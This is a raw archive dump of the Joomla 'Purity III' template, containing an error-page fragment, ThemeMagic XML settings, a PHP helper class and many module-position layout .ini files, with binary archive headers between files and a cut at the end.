			<div id="techinfo">
			<p><?php echo htmlspecialchars($this->error->getMessage()); ?></p>

			<p>
				<?php if ($this->debug) :
					echo $this->renderBacktrace();
				endif; ?>
			</p>
			</div>
			</div>
		</div>
		</div>
	</div>
</body>
</html>
PKԜ�\;Q�llpurity_iii/thememagic.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<form>

	<fields name="thememagic" addfieldpath="/plugins/system/t3/includes/depend">

		<fieldset name="typo_params" label="T3_TM_TYPO">
			<field name="typo_params_default" type="t3depend" function="@group">
				<option for="font-family-base" value="undefined">font-family-base-custom</option>
				<option for="headings-font-family" value="undefined">headings-font-family-custom</option>
			</field>

			<field name="font-size-base" type="text" size="10" class="input-tiny t3tm-dimension" 
				label="T3_TM_VARS_FONTSIZE_LABEL"
				description="T3_TM_VARS_FONTSIZE_DESC" />

			<field name="font-family-base" type="list"
				label="T3_TM_VARS_FONTFAMILY_LABEL" 
				description="T3_TM_VARS_FONTFAMILY_DESC" >
				<option value="">JDEFAULT</option>
				<option value="sans-serif">T3_TM_VARS_FONTFAMILY_SANS_SERIF</option>
				<option value="serif">T3_TM_VARS_FONTFAMILY_SERIF</option>
				<option value="monospace">T3_TM_VARS_FONTFAMILY_MONOSPACE</option>
				<option value="undefined">T3_TM_VARS_FONTFAMILY_CUSTOM</option>  
			</field>

			<field name="font-family-base-custom" type="text" size="30" class="t3tm-font"
				label="T3_TM_VARS_FONTFAMILY_CUSTOM_LABEL"
				description="T3_TM_VARS_FONTFAMILY_CUSTOM_DESC" />

			<field name="headings-font-family" type="list"
				label="T3_TM_VARS_HEADINGFONTFAMILY_LABEL" 
				description="T3_TM_VARS_HEADINGFONTFAMILY_DESC" >
				<option value="">JDEFAULT</option>
				<option value="sans-serif">T3_TM_VARS_FONTFAMILY_SANS_SERIF</option>
				<option value="serif">T3_TM_VARS_FONTFAMILY_SERIF</option>
				<option value="monospace">T3_TM_VARS_FONTFAMILY_MONOSPACE</option>
				<option value="undefined">T3_TM_VARS_FONTFAMILY_CUSTOM</option>  
			</field>
			<field name="headings-font-family-custom" type="text" size="30" class="t3tm-font"
				label="T3_TM_VARS_FONTFAMILY_CUSTOM_LABEL"
				description="T3_TM_VARS_FONTFAMILY_CUSTOM_DESC" />

		</fieldset>

		<fieldset name="colors_params" label="T3_TM_COLORS">        
			<field name="brand-primary" type="color" class="t3tm-color" label="T3_TM_VARS_PRIMARY_COLOR_LABEL" description="T3_TM_VARS_PRIMARY_COLOR_DESC" />
			<!--field name="brand-secondary" type="color" class="t3tm-color" label="T3_TM_VARS_SECONDARY_COLOR_LABEL" description="T3_TM_VARS_SECONDARY_COLOR_DESC" /-->
			<field name="body-bg" type="color" class="t3tm-color" label="T3_TM_VARS_BODY_BKG_LABEL" description="T3_TM_VARS_BODY_BKG_DESC" />
			<field name="text-color" type="color" class="t3tm-color" label="T3_TM_VARS_TEXT_COLOR_LABEL" description="T3_TM_VARS_TEXT_COLOR_DESC" />
			<field name="headings-color" type="color" class="t3tm-color" label="T3_TM_VARS_HEADING_COLOR_LABEL" description="T3_TM_VARS_HEADING_COLOR_DESC" />
			<field name="link-color" type="color" class="t3tm-color" label="T3_TM_VARS_LINK_COLOR_LABEL" description="T3_TM_VARS_LINK_COLOR_DESC" />
		</fieldset>

		<fieldset name="visual_params" label="T3_TM_VISUAL">
			<field name="border-radius-base" type="text" class="input-tiny t3tm-dimension" label="T3_TM_VARS_ELEMENT_RADIUS_BASE_LABEL" description="T3_TM_VARS_ELEMENT_RADIUS_BASE_DESC" />
			<field name="border-radius-large" type="text" class="input-tiny t3tm-dimension" label="T3_TM_VARS_ELEMENT_RADIUS_LARGE_LABEL" description="T3_TM_VARS_ELEMENT_RADIUS_LARGE_DESC" />
			<field name="border-radius-small" type="text" class="input-tiny t3tm-dimension" label="T3_TM_VARS_ELEMENT_RADIUS_SMALL_LABEL" description="T3_TM_VARS_ELEMENT_RADIUS_SMALL_DESC" />
		</fieldset>

		<fieldset name="module_params" label="T3_TM_MODULE">
			<field name="t3-module-bg" type="color" class="t3tm-color" label="T3_TM_VARS_MODULE_BGCOLOR_LABEL" description="T3_TM_VARS_MODULE_BGCOLOR_DESC" />
			<field name="t3-module-color" type="color" class="t3tm-color" label="T3_TM_VARS_MODULE_COLOR_LABEL" description="T3_TM_VARS_MODULE_COLOR_DESC" />
			<field name="t3-module-title-bg" type="color" class="t3tm-color" label="T3_TM_VARS_MODULE_TITLE_BGCOLOR_LABEL" description="T3_TM_VARS_MODULE_TITLE_BGCOLOR_DESC" />
			<field name="t3-module-title-color" type="color" class="t3tm-color" label="T3_TM_VARS_MODULE_TITLE_COLOR_LABEL" description="T3_TM_VARS_MODULE_TITLE_COLOR_DESC" />
		</fieldset>

		<fieldset name="spotlight_params" label="T3_TM_SPOTLIGHT">
			<field name="t3-spotlight-background" type="color" class="t3tm-color" label="T3_TM_VARS_SPL_BGCOLOR_LABEL" description="T3_TM_VARS_SPL_BGCOLOR_DESC" />
			<field name="t3-spotlight-text-color" type="color" class="t3tm-color" label="T3_TM_VARS_SPL_COLOR_LABEL" description="T3_TM_VARS_SPL_COLOR_DESC" />
		</fieldset>

		<fieldset name="links_params" label="T3_TM_FOOTER">

			<field name="t3-footer-background" type="color" class="t3tm-color" label="T3_VARS_FOOTER_BG_LABEL" description="T3_VARS_FOOTER_BG_DESC" />
			<field name="t3-footer-text-color" type="color" class="t3tm-color" label="T3_VARS_FOOTER_COLOR_LABEL" description="T3_VARS_FOOTER_COLOR_DESC" />
			
			<field name="t3-footer-module-background" type="color" class="t3tm-color" label="T3_VARS_FOOTER_MOD_BG_LABEL" description="T3_VARS_FOOTER_MOD_BG_DESC" />
			<field name="t3-footer-module-text-color" type="color" class="t3tm-color" label="T3_VARS_FOOTER_MOD_COLOR_LABEL" description="T3_VARS_FOOTER_MOD_COLOR_DESC" />
			<field name="t3-footer-module-title-color" type="color" class="t3tm-color" label="T3_VARS_FOOTER_MOD_TCOLOR_LABEL" description="T3_VARS_FOOTER_MOD_TCOLOR_DESC" />
		</fieldset>

		<fieldset name="grid_params" label="T3_TM_GRID">
			<!-- Grid -->

			<field name="container-lg" type="text" default="1170px" class="t3tm-dimension" label="T3_TM_VARS_SCFD_LG_WIDTH_LABEL" description="T3_TM_VARS_SCFD_LG_WIDTH_DESC" />

			<field name="container-md" type="text" default="970px" class="t3tm-dimension" label="T3_TM_VARS_SCFD_MID_WIDTH_LABEL" description="T3_TM_VARS_SCFD_MID_WIDTH_DESC" />
			
			<field name="container-sm" type="text" default="750px" class="t3tm-dimension" label="T3_TM_VARS_SCFD_SM_WIDTH_LABEL" description="T3_TM_VARS_SCFD_SM_WIDTH_DESC" />
			
			<field name="grid-gutter-width" type="text" default="30px" class="t3tm-dimension" label="T3_TM_VARS_SCFD_GUTTER_LABEL" description="T3_TM_VARS_SCFD_GUTTER_DESC" />

			<!-- End Grid -->
		</fieldset>

	</fields>
</form>PKԜ�\��&̵�purity_iii/helper.phpnu&1i�<?php
defined('_JEXEC') or die;
use Joomla\CMS\Helper\ModuleHelper as JModuleHelper;

if(version_compare(JVERSION, '4', 'ge')){
		class ModArticlesCategoryHelper extends \Joomla\Module\ArticlesCategory\Site\Helper\ArticlesCategoryHelper{};
		class ModArticlesCategoriesHelper extends \Joomla\Module\ArticlesCategories\Site\Helper\ArticlesCategoriesHelper{};
	}else{
		// Include the helper functions mod_articles_category
		JLoader::register('ModArticlesCategoryHelper',JPATH_ROOT . '/modules/mod_articles_category/helper.php');
		JLoader::register('ModArticlesCategoriesHelper',JPATH_ROOT . '/modules/mod_articles_categories/helper.php');
	}
class JATemplateHelper
{
	public function __construct()
	{
		
	}
	public static function getArticles($params, $catid, $count, $front = 'show')
	{
		$aparams = clone $params;
		$aparams->set('count', $count);
		$aparams->set('show_front', $front);
		$aparams->set('catid', (array)$catid);
		$aparams->set('show_child_category_articles', 1);
		$aparams->set('levels', 10);
		$aparams->set('created_by_alias', -1);
		$alist = ModArticlesCategoryHelper::getList($aparams);
		return $alist;
	}

	public static function getCategories($parent = 'root', $count = 0)
	{
		$params = new JRegistry();
		$params->set('parent', $parent);
		$params->set('count', $count);
		return ModArticlesCategoriesHelper::getList($params);
	}

	public static function loadModule($name, $style = 'raw')
	{
		jimport('joomla.application.module.helper');
		$module = JModuleHelper::getModule($name);
		$params = array('style' => $style);
		echo JModuleHelper::renderModule($module, $params);
	}

	public static function loadModules($position, $style = 'raw')
	{
		jimport('joomla.application.module.helper');
		$modules = JModuleHelper::getModules($position);
		$params = array('style' => $style);
		foreach ($modules as $module) {
			echo JModuleHelper::renderModule($module, $params);
		}
	}

}

?>PKԜ�\f�۪JJ.purity_iii/etc/layout/default-content-left.ininu&1i�[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[mast-col]
position="mast-col"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[navhelper]
position="navhelper"

[footer]
position="footer"

[block1@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-1"

[block2@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-2"

[block3@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-3"

[block4@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-4"

[block1@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-5"

[block2@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-6"

[block3@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-7"

[block4@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-8"

[block1@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\�&��KK/purity_iii/etc/layout/default-content-right.ininu&1i�
[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[mast-col]
position="mast-col"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[navhelper]
position="navhelper"

[footer]
position="footer"

[block1@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-1"

[block2@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-2"

[block3@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-3"

[block4@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-4"

[block1@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-5"

[block2@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-6"

[block3@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-7"

[block4@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-8"

[block1@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\۰[Q11!purity_iii/etc/layout/company.ininu&1i�
[off-canvas]
position="off-canvas"

[product-1-1]
position="product-1-1"

[product-1-2]
position="product-1-2"

[product-1-3]
position="product-1-3"

[product-1-4]
position="product-1-4"

[product-1-5]
position="product-1-5"

[footer]
position="footer"

[block1@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\۰[Q11#purity_iii/etc/layout/product-1.ininu&1i�
[off-canvas]
position="off-canvas"

[product-1-1]
position="product-1-1"

[product-1-2]
position="product-1-2"

[product-1-3]
position="product-1-3"

[product-1-4]
position="product-1-4"

[product-1-5]
position="product-1-5"

[footer]
position="footer"

[block1@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\C�'���"purity_iii/etc/layout/porfolio.ininu&1i�
[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[footer]
position="footer"

[block1@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\�^����#purity_iii/etc/layout/corporate.ininu&1i�[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[slideshow]
position="slideshow"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[footer]
position="footer"

[block1@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-6"
position="position-1"

[block2@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-6"
position="position-2"

[block3@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-6"
position="position-3"

[block4@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-6"
position="position-4"

[block1@spotlight-2]
lg="col-lg-12"
md="col-md-12"
sm="col-sm-12"
xs="col-xs-12"
position="position-5"

[block1@spotlight-3]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-12"
position="position-9"

[block2@spotlight-3]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-12"
position="position-10"

[block3@spotlight-3]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-12"
position="position-11"

[block4@spotlight-3]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-12"
position="position-12"

[block1@footer-sl]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-6"
xs="col-xs-6"
position="footer-4"PKԜ�\2E�/��*purity_iii/etc/layout/features-intro-2.ininu&1i�
[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[features-intro-2]
position="features-intro-2"

[footer]
position="footer"

[block1@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\d�o�]] purity_iii/etc/layout/home-1.ininu&1i�
[head-search]
position="head-search"

[languageswitcherload]
position="languageswitcherload"

[off-canvas]
position="off-canvas"

[home-1]
position="home-1"

[home-2]
position="home-2"

[home-3]
position="home-3"

[home-4]
position="home-4"

[home-5]
position="home-5"

[footer]
position="footer"

[block1@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\�K�|WW!purity_iii/etc/layout/default.ininu&1i�
[head-search]
position="head-search"

[languageswitcherload]
position="languageswitcherload"

[off-canvas]
position="off-canvas"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[navhelper]
position="navhelper"

[footer]
position="footer"

[block1@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-1"

[block2@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-2"

[block3@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-3"

[block4@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-4"

[block1@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-5"

[block2@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-6"

[block3@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-7"

[block4@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-8"

[block1@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\��e���purity_iii/etc/layout/docs.ininu&1i�
[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[footer]
position="footer"

[block1@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\^�ȥ�*purity_iii/etc/layout/features-intro-1.ininu&1i�
[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[footer]
position="footer"

[block1@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\m��"purity_iii/etc/layout/magazine.ininu&1i�
[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[navhelper]
position="navhelper"

[footer]
position="footer"

[block1@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\��e���#purity_iii/etc/layout/portfolio.ininu&1i�
[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[footer]
position="footer"

[block1@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\۰[Q11'purity_iii/etc/layout/product-intro.ininu&1i�
[off-canvas]
position="off-canvas"

[product-1-1]
position="product-1-1"

[product-1-2]
position="product-1-2"

[product-1-3]
position="product-1-3"

[product-1-4]
position="product-1-4"

[product-1-5]
position="product-1-5"

[footer]
position="footer"

[block1@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\۰[Q11#purity_iii/etc/layout/product-2.ininu&1i�
[off-canvas]
position="off-canvas"

[product-1-1]
position="product-1-1"

[product-1-2]
position="product-1-2"

[product-1-3]
position="product-1-3"

[product-1-4]
position="product-1-4"

[product-1-5]
position="product-1-5"

[footer]
position="footer"

[block1@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\��e���purity_iii/etc/layout/blog.ininu&1i�
[off-canvas]
position="off-canvas"

[head-search]
position="head-search"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[footer]
position="footer"

[block1@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footer-sl]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-6"PKԜ�\s�2���-purity_iii/etc/layout/addon.product-intro.ininu&1i�
[off-canvas]
position="off-canvas"

[sidebar-1]
position="sidebar-1"

[sidebar-2]
position="sidebar-2"

[navhelper]
position="navhelper"

[footer]
position="footer"

[block1@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-1"

[block2@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-2"

[block3@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-3"

[block4@spotlight-1]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-4"

[block1@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-5"

[block2@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-6"

[block3@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-7"

[block4@spotlight-2]
lg="col-lg-3"
md="col-md-3"
sm="col-sm-3"
xs="col-xs-6"
position="position-8"

[block1@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-1"

[block2@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-2"

[block3@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-3"

[block4@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-4"

[block5@footnav]
lg="col-lg-2"
md="col-md-2"
sm="col-sm-4"
xs="col-xs-6"
position="footer-5"

[block6@footnav]
